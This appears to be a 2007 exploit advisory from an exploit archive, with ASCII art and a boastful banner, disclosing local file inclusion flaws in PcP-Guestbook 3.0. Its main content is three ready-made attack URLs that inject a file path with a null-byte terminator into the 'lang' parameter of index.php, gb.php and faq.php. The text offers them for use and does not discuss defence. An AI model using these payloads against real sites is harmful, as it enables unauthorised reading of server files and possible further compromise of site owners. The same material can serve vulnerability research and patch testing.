id: 1724
date: 04/07/2007
title: PcP-Guestbook 3.0 (lang) Local File Inclusion Vulnerabilities
author: Dj7xpl
cves: 

=============================================================
PcP-Guestbook 3.0 (lang) Local File Inclusion Vulnerabilities
=============================================================



                                                          .-""""""""-.                                 
                                                         /   Dj7xpl   \                              
                                                        |              |                                
                                                        |,  .-.  .-.  ,|                                
                                                        | )(_o/  \o_)( |                                     
                                                        |/     /\     \|                                 
                                              (@_       (_     ^^     _)                  
                                         _     ) \_______\__|IIIIII|__/_______________________________
                                        (_)@8@8{}<________|-\IIIIII/-|________________________________>
                                               )_/        \          / 
                                               (@
											   
+_______________________________________________Iranian Are The Best In World___________________________________________+
*
*
*       [~] Portal.......:    PcP-Book 3.0
*	[~] Author.......:    Dj7xpl 
*
+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
*
*
*
*       [~] Vuln.........:         http://[Target]/[Path]/index.php?lang=[File-To-Require]%00
*                                  http://[Target]/[Path]/gb.php?lang=[File-To-Require]%00
*                                  http://[Target]/[Path]/faq.php?lang=[File-To-Require]%00
*                             
*		
+_______________________________________________________________________________________________________________________+



#  0day.today [2023-03-25]  #